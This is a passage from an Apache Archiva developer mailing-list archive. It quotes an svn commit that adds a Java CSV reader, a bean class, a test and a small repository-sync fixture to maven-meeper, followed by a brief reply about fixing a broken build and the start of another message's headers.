maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/ > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/ > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/meeper/ > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/meeper/sync.csv (with props) > Modified: > maven/archiva/trunk/maven-meeper/ (props changed) > maven/archiva/trunk/maven-meeper/pom.xml > > Propchange: maven/archiva/trunk/maven-meeper/ > ---------------------------------------------------------------------- > -------- > --- svn:ignore (original) > +++ svn:ignore Thu Jun 21 11:27:33 2007 > @@ -1,8 +1,9 @@ > -target > -*~ > -*.log > -.classpath > -.project > -*.ipr > -*.iws > -*.iml > +target > +*~ > +*.log > +.classpath > +.project > +*.ipr > +*.iws > +*.iml > +.settings > > Modified: maven/archiva/trunk/maven-meeper/pom.xml > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > pom.xml?view=diff&rev=549579&r1=549578&r2=549579 > ====================================================================== > ======== > --- maven/archiva/trunk/maven-meeper/pom.xml (original) > +++ maven/archiva/trunk/maven-meeper/pom.xml Thu Jun 21 11:27:33 2007 > @@ -15,7 +15,8 @@ > ~ limitations under the License. > --> > > -<project xmlns="http://maven.apache.org/POM/4.0.0" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http:// > maven.apache.org/maven-v4_0_0.xsd"> > +<project xmlns="http://maven.apache.org/POM/4.0.0" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 > http://maven.apache.org/maven-v4_0_0.xsd"> > <parent> > <groupId>org.apache.maven.archiva</groupId> > <artifactId>archiva-parent</artifactId> > @@ -23,6 +24,19 @@ > </parent> > <modelVersion>4.0.0</modelVersion> > <artifactId>maven-meeper</artifactId> > - <packaging>pom</packaging> > <name>Maven Meeper</name> > + > + <dependencies> > + <dependency> > + <groupId>org.apache.commons</groupId> > + <artifactId>commons-csv</artifactId> > + <version>1.0-SNAPSHOT</version> > + </dependency> > + <dependency> > + <groupId>commons-lang</groupId> > + <artifactId>commons-lang</artifactId> > + <version>2.2</version> > + </dependency> > + </dependencies> > + > </project> > > Added: maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > maven/archiva/meeper/Reader.java > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > src/main/java/org/apache/maven/archiva/meeper/Reader.java? > view=auto&rev=549579 > ====================================================================== > ======== > --- maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/Reader.java (added) > +++ maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/Reader.java Thu Jun 21 11:27:33 2007 > @@ -0,0 +1,62 @@ > +package org.apache.maven.archiva.meeper; > + > +/* > + * Licensed to the Apache Software Foundation (ASF) under one or > more contributor license > + * agreements. See the NOTICE file distributed with this work for > additional information regarding > + * copyright ownership. The ASF licenses this file to you under > the Apache License, Version 2.0 (the > + * "License"); you may not use this file except in compliance with > the License. You may obtain a > + * copy of the License at > + * > + * http://www.apache.org/licenses/LICENSE-2.0 > + * > + * Unless required by applicable law or agreed to in writing, > software distributed under the License > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > CONDITIONS OF ANY KIND, either express > + * or implied. See the License for the specific language governing > permissions and limitations under > + * the License. > + */ > + > +import java.io.IOException; > +import java.io.InputStream; > +import java.io.InputStreamReader; > +import java.util.ArrayList; > +import java.util.List; > + > +import org.apache.commons.csv.CSVParser; > + > +/** > + * Read a csv file with the synced repositories information > + * > + * @author <a href="mailto:[email protected]">Carlos Sanchez</a> > + * @version $Id$ > + */ > +public class Reader > +{ > + private CSVParser parser; > + > + public Reader( InputStream stream ) > + { > + parser = new CSVParser( new InputStreamReader( stream ) ); > + } > + > + public List parse() > + throws IOException > + { > + String[][] data = parser.getAllValues(); > + List repos = new ArrayList( data.length - 1 ); > + > + /* ignore headers line */ > + for ( int i = 1; i < data.length; i++ ) > + { > + int j = 0; > + SyncedRepository repo = new SyncedRepository(); > + repo.setGroupId( data[i][j++] ); > + repo.setLocation( data[i][j++] ); > + repo.setProtocol( data[i][j++] ); > + repo.setContactName( data[i][j++] ); > + repo.setContactMail( data[i][j++] ); > + repos.add( repo ); > + } > + > + return repos; > + } > +} > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > apache/maven/archiva/meeper/Reader.java > ---------------------------------------------------------------------- > -------- > svn:eol-style = native > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > apache/maven/archiva/meeper/Reader.java > ---------------------------------------------------------------------- > -------- > svn:keywords = "Author Date Id Revision" > > Added: maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > maven/archiva/meeper/SyncedRepository.java > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > src/main/java/org/apache/maven/archiva/meeper/SyncedRepository.java? > view=auto&rev=549579 > ====================================================================== > ======== > --- maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/SyncedRepository.java (added) > +++ maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/SyncedRepository.java Thu Jun 21 11:27:33 2007 > @@ -0,0 +1,92 @@ > +package org.apache.maven.archiva.meeper; > + > +/* > + * Licensed to the Apache Software Foundation (ASF) under one or > more contributor license > + * agreements. See the NOTICE file distributed with this work for > additional information regarding > + * copyright ownership. The ASF licenses this file to you under > the Apache License, Version 2.0 (the > + * "License"); you may not use this file except in compliance with > the License. You may obtain a > + * copy of the License at > + * > + * http://www.apache.org/licenses/LICENSE-2.0 > + * > + * Unless required by applicable law or agreed to in writing, > software distributed under the License > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > CONDITIONS OF ANY KIND, either express > + * or implied. See the License for the specific language governing > permissions and limitations under > + * the License. > + */ > + > +import org.apache.commons.lang.builder.ReflectionToStringBuilder; > + > +/** > + * Stores a synced repository data. > + * > + * @author <a href="mailto:[email protected]">Carlos Sanchez</a> > + * @version $Id$ > + */ > +public class SyncedRepository > +{ > + private String groupId; > + > + private String location; > + > + private String protocol; > + > + private String contactName; > + > + private String contactMail; > + > + public void setGroupId( String groupId ) > + { > + this.groupId = groupId; > + } > + > + public String getGroupId() > + { > + return groupId; > + } > + > + public void setContactName( String contactName ) > + { > + this.contactName = contactName; > + } > + > + public String getContactName() > + { > + return contactName; > + } > + > + public void setContactMail( String contactMail ) > + { > + this.contactMail = contactMail; > + } > + > + public String getContactMail() > + { > + return contactMail; > + } > + > + public void setLocation( String location ) > + { > + this.location = location; > + } > + > + public String getLocation() > + { > + return location; > + } > + > + public void setProtocol( String protocol ) > + { > + this.protocol = protocol; > + } > + > + public String getProtocol() > + { > + return protocol; > + } > + > + public String toString() > + { > + return ReflectionToStringBuilder.toString( this ); > + } > +} > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > apache/maven/archiva/meeper/SyncedRepository.java > ---------------------------------------------------------------------- > -------- > svn:eol-style = native > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > apache/maven/archiva/meeper/SyncedRepository.java > ---------------------------------------------------------------------- > -------- > svn:keywords = "Author Date Id Revision" > > Added: maven/archiva/trunk/maven-meeper/src/test/java/org/apache/ > maven/archiva/meeper/ReaderTest.java > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > src/test/java/org/apache/maven/archiva/meeper/ReaderTest.java? > view=auto&rev=549579 > ====================================================================== > ======== > --- maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > archiva/meeper/ReaderTest.java (added) > +++ maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > archiva/meeper/ReaderTest.java Thu Jun 21 11:27:33 2007 > @@ -0,0 +1,50 @@ > +package org.apache.maven.archiva.meeper; > + > +/* > + * Licensed to the Apache Software Foundation (ASF) under one or > more contributor license > + * agreements. See the NOTICE file distributed with this work for > additional information regarding > + * copyright ownership. The ASF licenses this file to you under > the Apache License, Version 2.0 (the > + * "License"); you may not use this file except in compliance with > the License. You may obtain a > + * copy of the License at > + * > + * http://www.apache.org/licenses/LICENSE-2.0 > + * > + * Unless required by applicable law or agreed to in writing, > software distributed under the License > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > CONDITIONS OF ANY KIND, either express > + * or implied. See the License for the specific language governing > permissions and limitations under > + * the License. > + */ > + > +import java.util.Iterator; > +import java.util.List; > + > +import junit.framework.TestCase; > + > +public class ReaderTest > + extends TestCase > +{ > + > + private Reader reader; > + > + protected void setUp() > + throws Exception > + { > + super.setUp(); > + > + reader = new Reader( this.getClass().getClassLoader() > + .getResourceAsStream( "org/apache/maven/archiva/meeper/ > sync.csv" ) ); > + } > + > + public void testParse() > + throws Exception > + { > + List repos = reader.parse(); > + assertEquals( 2, repos.size() ); > + for ( Iterator it = repos.iterator(); it.hasNext(); ) > + { > + SyncedRepository repo = (SyncedRepository) it.next(); > + System.out.println( repo ); > + } > + } > + > +} > > Propchange: maven/archiva/trunk/maven-meeper/src/test/java/org/ > apache/maven/archiva/meeper/ReaderTest.java > ---------------------------------------------------------------------- > -------- > svn:eol-style = native > > Propchange: maven/archiva/trunk/maven-meeper/src/test/java/org/ > apache/maven/archiva/meeper/ReaderTest.java > ---------------------------------------------------------------------- > -------- > svn:keywords = "Author Date Id Revision" > > Added: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > apache/maven/archiva/meeper/sync.csv > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > src/test/resources/org/apache/maven/archiva/meeper/sync.csv? > view=auto&rev=549579 > ====================================================================== > ======== > --- maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/meeper/sync.csv (added) > +++ maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > maven/archiva/meeper/sync.csv Thu Jun 21 11:27:33 2007 > @@ -0,0 +1,3 @@ > +"groupId","location","protocol","contactName","contactMail" > +"asm","[email protected]:../../groups/maven/htdocs/ > maven2","rsync_ssh","EugeneKuleshov","[email protected]" > +"ch.qos.logback","rsync://pixie.qos.ch/mvnrepo","rsync","Ceki > Gulcu","[email protected]" > > Propchange: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > apache/maven/archiva/meeper/sync.csv > ---------------------------------------------------------------------- > -------- > svn:eol-style = native > > Propchange: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > apache/maven/archiva/meeper/sync.csv > ---------------------------------------------------------------------- > -------- > svn:keywords = "Author Date Id Revision" > From [email protected] Fri Jun 22 04:09:48 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51309 invoked from network); 22 Jun 2007 04:09:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2007 04:09:47 -0000 Received: (qmail 58396 invoked by uid 500); 22 Jun 2007 04:09:50 -0000 Delivered-To: [email protected] Received: (qmail 58367 invoked by uid 500); 22 Jun 2007 04:09:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58355 invoked by uid 99); 22 Jun 2007 04:09:50 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 21:09:50 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 21:09:46 -0700 Received: by ug-out-1314.google.com with SMTP id 34so809988ugf for <[email protected]>; Thu, 21 Jun 2007 21:09:24 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=jODSXG3+o+VzyMAleWMd9BPF/6FoKUuWk1BZibXWVsPAGPvgWVYt71qVFAPh4DjDI3j9Aw73GoMPVNjOr9JWKuEKoEtbIZP7tBragUy3OHAW+k9pthzb+sOgpGt5X7rpb2jJwGYQP/iaTb0yuY6lDQamOYyvmXm2gRc24i6gCfU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=AYN2/dB7A16vWZ3skpJ9Kg4xQk6+dCnLg86lqx93Amyk2HvVSmumUIuBax8qTNvf6hrs/sOsjNM8cIsXi9YDvhCI9ECRIoi8xk+8w4XydAMTuCKBo6qx33b6b3pamTetnaqIa0FsjhwoQ4cmHlLQ5+DnQWIiWUuhZ8iE6Kb4rb4= Received: by 161.129.204.104 with SMTP id z15mr2501800ugl.1182485364651; Thu, 21 Jun 2007 21:09:24 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 21 Jun 2007 21:09:24 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 21 Jun 2007 21:09:24 -0700 From: "Carlos Sanchez" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: svn commit: r549579 - in /maven/archiva/trunk/maven-meeper: ./ src/main/ src/main/java/ src/main/java/org/ src/main/java/org/apache/ src/main/java/org/apache/maven/ src/main/java/org/apache/maven/archiva/ src/main/java/org/apache/maven/archiva/me MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Google-Sender-Auth: 51fd7900ed0047a9 X-Virus-Checked: Checked by ClamAV on apache.org sorry, fixed On 6/21/07, Brett Porter <[email protected]> wrote: > You broke the build (commons-csv isn't published in a listed repository) > > On 22/06/2007, at 4:27 AM, [email protected] wrote: > > > Author: carlos > > Date: Thu Jun 21 11:27:33 2007 > > New Revision: 549579 > > > > URL: http://svn.apache.org/viewvc?view=rev&rev=549579 > > Log: > > Add some code for a possible implementation for syncing > > repositories using only one file with the data > > > > Added: > > maven/archiva/trunk/maven-meeper/src/main/ > > maven/archiva/trunk/maven-meeper/src/main/java/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/ > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/Reader.java (with props) > > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/SyncedRepository.java (with props) > > maven/archiva/trunk/maven-meeper/src/main/resources/ > > maven/archiva/trunk/maven-meeper/src/test/ > > maven/archiva/trunk/maven-meeper/src/test/java/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > archiva/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > archiva/meeper/ > > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > archiva/meeper/ReaderTest.java (with props) > > maven/archiva/trunk/maven-meeper/src/test/resources/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/meeper/ > > maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/meeper/sync.csv (with props) > > Modified: > > maven/archiva/trunk/maven-meeper/ (props changed) > > maven/archiva/trunk/maven-meeper/pom.xml > > > > Propchange: maven/archiva/trunk/maven-meeper/ > > ---------------------------------------------------------------------- > > -------- > > --- svn:ignore (original) > > +++ svn:ignore Thu Jun 21 11:27:33 2007 > > @@ -1,8 +1,9 @@ > > -target > > -*~ > > -*.log > > -.classpath > > -.project > > -*.ipr > > -*.iws > > -*.iml > > +target > > +*~ > > +*.log > > +.classpath > > +.project > > +*.ipr > > +*.iws > > +*.iml > > +.settings > > > > Modified: maven/archiva/trunk/maven-meeper/pom.xml > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > > pom.xml?view=diff&rev=549579&r1=549578&r2=549579 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/maven-meeper/pom.xml (original) > > +++ maven/archiva/trunk/maven-meeper/pom.xml Thu Jun 21 11:27:33 2007 > > @@ -15,7 +15,8 @@ > > ~ limitations under the License. > > --> > > > > -<project xmlns="http://maven.apache.org/POM/4.0.0" > > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > > xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http:// > > maven.apache.org/maven-v4_0_0.xsd"> > > +<project xmlns="http://maven.apache.org/POM/4.0.0" > > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > > + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 > > http://maven.apache.org/maven-v4_0_0.xsd"> > > <parent> > > <groupId>org.apache.maven.archiva</groupId> > > <artifactId>archiva-parent</artifactId> > > @@ -23,6 +24,19 @@ > > </parent> > > <modelVersion>4.0.0</modelVersion> > > <artifactId>maven-meeper</artifactId> > > - <packaging>pom</packaging> > > <name>Maven Meeper</name> > > + > > + <dependencies> > > + <dependency> > > + <groupId>org.apache.commons</groupId> > > + <artifactId>commons-csv</artifactId> > > + <version>1.0-SNAPSHOT</version> > > + </dependency> > > + <dependency> > > + <groupId>commons-lang</groupId> > > + <artifactId>commons-lang</artifactId> > > + <version>2.2</version> > > + </dependency> > > + </dependencies> > > + > > </project> > > > > Added: maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > > maven/archiva/meeper/Reader.java > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > > src/main/java/org/apache/maven/archiva/meeper/Reader.java? > > view=auto&rev=549579 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/Reader.java (added) > > +++ maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/Reader.java Thu Jun 21 11:27:33 2007 > > @@ -0,0 +1,62 @@ > > +package org.apache.maven.archiva.meeper; > > + > > +/* > > + * Licensed to the Apache Software Foundation (ASF) under one or > > more contributor license > > + * agreements. See the NOTICE file distributed with this work for > > additional information regarding > > + * copyright ownership. The ASF licenses this file to you under > > the Apache License, Version 2.0 (the > > + * "License"); you may not use this file except in compliance with > > the License. You may obtain a > > + * copy of the License at > > + * > > + * http://www.apache.org/licenses/LICENSE-2.0 > > + * > > + * Unless required by applicable law or agreed to in writing, > > software distributed under the License > > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > > CONDITIONS OF ANY KIND, either express > > + * or implied. See the License for the specific language governing > > permissions and limitations under > > + * the License. > > + */ > > + > > +import java.io.IOException; > > +import java.io.InputStream; > > +import java.io.InputStreamReader; > > +import java.util.ArrayList; > > +import java.util.List; > > + > > +import org.apache.commons.csv.CSVParser; > > + > > +/** > > + * Read a csv file with the synced repositories information > > + * > > + * @author <a href="mailto:[email protected]">Carlos Sanchez</a> > > + * @version $Id$ > > + */ > > +public class Reader > > +{ > > + private CSVParser parser; > > + > > + public Reader( InputStream stream ) > > + { > > + parser = new CSVParser( new InputStreamReader( stream ) ); > > + } > > + > > + public List parse() > > + throws IOException > > + { > > + String[][] data = parser.getAllValues(); > > + List repos = new ArrayList( data.length - 1 ); > > + > > + /* ignore headers line */ > > + for ( int i = 1; i < data.length; i++ ) > > + { > > + int j = 0; > > + SyncedRepository repo = new SyncedRepository(); > > + repo.setGroupId( data[i][j++] ); > > + repo.setLocation( data[i][j++] ); > > + repo.setProtocol( data[i][j++] ); > > + repo.setContactName( data[i][j++] ); > > + repo.setContactMail( data[i][j++] ); > > + repos.add( repo ); > > + } > > + > > + return repos; > > + } > > +} > > > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > > apache/maven/archiva/meeper/Reader.java > > ---------------------------------------------------------------------- > > -------- > > svn:eol-style = native > > > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > > apache/maven/archiva/meeper/Reader.java > > ---------------------------------------------------------------------- > > -------- > > svn:keywords = "Author Date Id Revision" > > > > Added: maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > > maven/archiva/meeper/SyncedRepository.java > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > > src/main/java/org/apache/maven/archiva/meeper/SyncedRepository.java? > > view=auto&rev=549579 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/SyncedRepository.java (added) > > +++ maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > > archiva/meeper/SyncedRepository.java Thu Jun 21 11:27:33 2007 > > @@ -0,0 +1,92 @@ > > +package org.apache.maven.archiva.meeper; > > + > > +/* > > + * Licensed to the Apache Software Foundation (ASF) under one or > > more contributor license > > + * agreements. See the NOTICE file distributed with this work for > > additional information regarding > > + * copyright ownership. The ASF licenses this file to you under > > the Apache License, Version 2.0 (the > > + * "License"); you may not use this file except in compliance with > > the License. You may obtain a > > + * copy of the License at > > + * > > + * http://www.apache.org/licenses/LICENSE-2.0 > > + * > > + * Unless required by applicable law or agreed to in writing, > > software distributed under the License > > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > > CONDITIONS OF ANY KIND, either express > > + * or implied. See the License for the specific language governing > > permissions and limitations under > > + * the License. > > + */ > > + > > +import org.apache.commons.lang.builder.ReflectionToStringBuilder; > > + > > +/** > > + * Stores a synced repository data. > > + * > > + * @author <a href="mailto:[email protected]">Carlos Sanchez</a> > > + * @version $Id$ > > + */ > > +public class SyncedRepository > > +{ > > + private String groupId; > > + > > + private String location; > > + > > + private String protocol; > > + > > + private String contactName; > > + > > + private String contactMail; > > + > > + public void setGroupId( String groupId ) > > + { > > + this.groupId = groupId; > > + } > > + > > + public String getGroupId() > > + { > > + return groupId; > > + } > > + > > + public void setContactName( String contactName ) > > + { > > + this.contactName = contactName; > > + } > > + > > + public String getContactName() > > + { > > + return contactName; > > + } > > + > > + public void setContactMail( String contactMail ) > > + { > > + this.contactMail = contactMail; > > + } > > + > > + public String getContactMail() > > + { > > + return contactMail; > > + } > > + > > + public void setLocation( String location ) > > + { > > + this.location = location; > > + } > > + > > + public String getLocation() > > + { > > + return location; > > + } > > + > > + public void setProtocol( String protocol ) > > + { > > + this.protocol = protocol; > > + } > > + > > + public String getProtocol() > > + { > > + return protocol; > > + } > > + > > + public String toString() > > + { > > + return ReflectionToStringBuilder.toString( this ); > > + } > > +} > > > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > > apache/maven/archiva/meeper/SyncedRepository.java > > ---------------------------------------------------------------------- > > -------- > > svn:eol-style = native > > > > Propchange: maven/archiva/trunk/maven-meeper/src/main/java/org/ > > apache/maven/archiva/meeper/SyncedRepository.java > > ---------------------------------------------------------------------- > > -------- > > svn:keywords = "Author Date Id Revision" > > > > Added: maven/archiva/trunk/maven-meeper/src/test/java/org/apache/ > > maven/archiva/meeper/ReaderTest.java > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > > src/test/java/org/apache/maven/archiva/meeper/ReaderTest.java? > > view=auto&rev=549579 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > archiva/meeper/ReaderTest.java (added) > > +++ maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > > archiva/meeper/ReaderTest.java Thu Jun 21 11:27:33 2007 > > @@ -0,0 +1,50 @@ > > +package org.apache.maven.archiva.meeper; > > + > > +/* > > + * Licensed to the Apache Software Foundation (ASF) under one or > > more contributor license > > + * agreements. See the NOTICE file distributed with this work for > > additional information regarding > > + * copyright ownership. The ASF licenses this file to you under > > the Apache License, Version 2.0 (the > > + * "License"); you may not use this file except in compliance with > > the License. You may obtain a > > + * copy of the License at > > + * > > + * http://www.apache.org/licenses/LICENSE-2.0 > > + * > > + * Unless required by applicable law or agreed to in writing, > > software distributed under the License > > + * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR > > CONDITIONS OF ANY KIND, either express > > + * or implied. See the License for the specific language governing > > permissions and limitations under > > + * the License. > > + */ > > + > > +import java.util.Iterator; > > +import java.util.List; > > + > > +import junit.framework.TestCase; > > + > > +public class ReaderTest > > + extends TestCase > > +{ > > + > > + private Reader reader; > > + > > + protected void setUp() > > + throws Exception > > + { > > + super.setUp(); > > + > > + reader = new Reader( this.getClass().getClassLoader() > > + .getResourceAsStream( "org/apache/maven/archiva/meeper/ > > sync.csv" ) ); > > + } > > + > > + public void testParse() > > + throws Exception > > + { > > + List repos = reader.parse(); > > + assertEquals( 2, repos.size() ); > > + for ( Iterator it = repos.iterator(); it.hasNext(); ) > > + { > > + SyncedRepository repo = (SyncedRepository) it.next(); > > + System.out.println( repo ); > > + } > > + } > > + > > +} > > > > Propchange: maven/archiva/trunk/maven-meeper/src/test/java/org/ > > apache/maven/archiva/meeper/ReaderTest.java > > ---------------------------------------------------------------------- > > -------- > > svn:eol-style = native > > > > Propchange: maven/archiva/trunk/maven-meeper/src/test/java/org/ > > apache/maven/archiva/meeper/ReaderTest.java > > ---------------------------------------------------------------------- > > -------- > > svn:keywords = "Author Date Id Revision" > > > > Added: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > > apache/maven/archiva/meeper/sync.csv > > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/maven-meeper/ > > src/test/resources/org/apache/maven/archiva/meeper/sync.csv? > > view=auto&rev=549579 > > ====================================================================== > > ======== > > --- maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/meeper/sync.csv (added) > > +++ maven/archiva/trunk/maven-meeper/src/test/resources/org/apache/ > > maven/archiva/meeper/sync.csv Thu Jun 21 11:27:33 2007 > > @@ -0,0 +1,3 @@ > > +"groupId","location","protocol","contactName","contactMail" > > +"asm","[email protected]:../../groups/maven/htdocs/ > > maven2","rsync_ssh","EugeneKuleshov","[email protected]" > > +"ch.qos.logback","rsync://pixie.qos.ch/mvnrepo","rsync","Ceki > > Gulcu","[email protected]" > > > > Propchange: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > > apache/maven/archiva/meeper/sync.csv > > ---------------------------------------------------------------------- > > -------- > > svn:eol-style = native > > > > Propchange: maven/archiva/trunk/maven-meeper/src/test/resources/org/ > > apache/maven/archiva/meeper/sync.csv > > ---------------------------------------------------------------------- > > -------- > > svn:keywords = "Author Date Id Revision" > > > -- I could give you my word as a Spaniard. No good. I've known too many Spaniards. -- The Princess Bride From [email protected] Sat Jun 23 04:11:45 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85194 invoked from network); 23 Jun 2007 04:11:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 04:11:43 -0000 Received: (qmail 30060 invoked by uid 500); 23 Jun 2007 04:11:47 -0000 Delivered-To: [email protected] Received: (qmail 29955 invoked by uid 500); 23 Jun 2007 04:11:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29942 invoked by uid 99); 23 Jun 2007 04:11:46 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:11:46 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:11:42 -0700 Received: by an-out-0708.google.com with SMTP id d30so255036and for <[email protected]>; Fri, 22 Jun 2007 21:11:21 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=NeIB0+rDJ7pgg+hSTDgnVKAfhuuFRbLhBtgTJWcrJ+FIgGwR8cVNideibK8E6bJPCp+ufqijsJgOXl8UOmAmGjt2mxTQdU3l5BjxS0J8dd2wKQ+UtO3WGhcBKh4TgIJPPxOSLdhooq7egohiIwWEyCDTojRYMKK5dv70WaNvzE0= DomainKey-Signature: a=rsa-sha1; 